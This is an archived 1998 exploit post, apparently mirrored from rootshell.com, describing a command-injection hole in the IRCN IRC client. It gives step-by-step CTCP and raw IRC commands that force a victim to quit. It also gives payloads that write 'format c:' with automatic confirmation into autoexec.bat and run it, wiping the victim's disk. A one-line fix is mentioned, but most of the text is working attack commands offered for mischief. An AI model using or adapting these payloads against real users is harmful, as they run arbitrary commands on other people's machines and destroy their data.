home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / ircn.txt < prev    next >
Encoding:
Text File  |  1998-07-23  |  1.1 KB  |  39 lines
  1. [ from http://www.rootshell.com/ ]
  2.  
  3. From tom@sensel.com Thu Jul 23 09:12:15 1998
  4. Date: Wed, 22 Jul 1998 23:02:37 -0400
  5. From: Tom <tom@sensel.com>
  6. To: www-request@rootshell.com
  7. Subject: Ircn Exploit..
  8.  
  9. While looking around at IRCN (irc client).. I noticed a hole in the code
  10. which allowed people to run programs, make the ircn user quit off irc, etc..
  11. There isn't really much to say about it.. Here is how you do it..
  12.  
  13. How to exploit bug:
  14.  
  15. In a windows irc client type:
  16. /ctcpreply (nickname) ping $quit(i,am,owned)
  17. Result:
  18. *** ^DaWg^ (DaWg@cc576078-a.essx1.md.home.com) Quit (owned by nofear)
  19.  
  20. For you unix users telnet to the irc server on port 6667 and type
  21. user bleh bleh bleh bleh bleh
  22. nick asdfksdjflk (this will be your nick.. Get creative)
  23. then type:
  24. notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)
  25. and bam!@#
  26.  
  27. How to fix bug:
  28. in your ircn client type /events off
  29.  
  30. There are a lot of nice little things you can do with this bug... here are a
  31. few..
  32.  
  33. /ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
  34. /ctcpreturn (nick) $run(c:\autoexec.bat)
  35.  
  36.  
  37. -NoFear
  38.  
  39.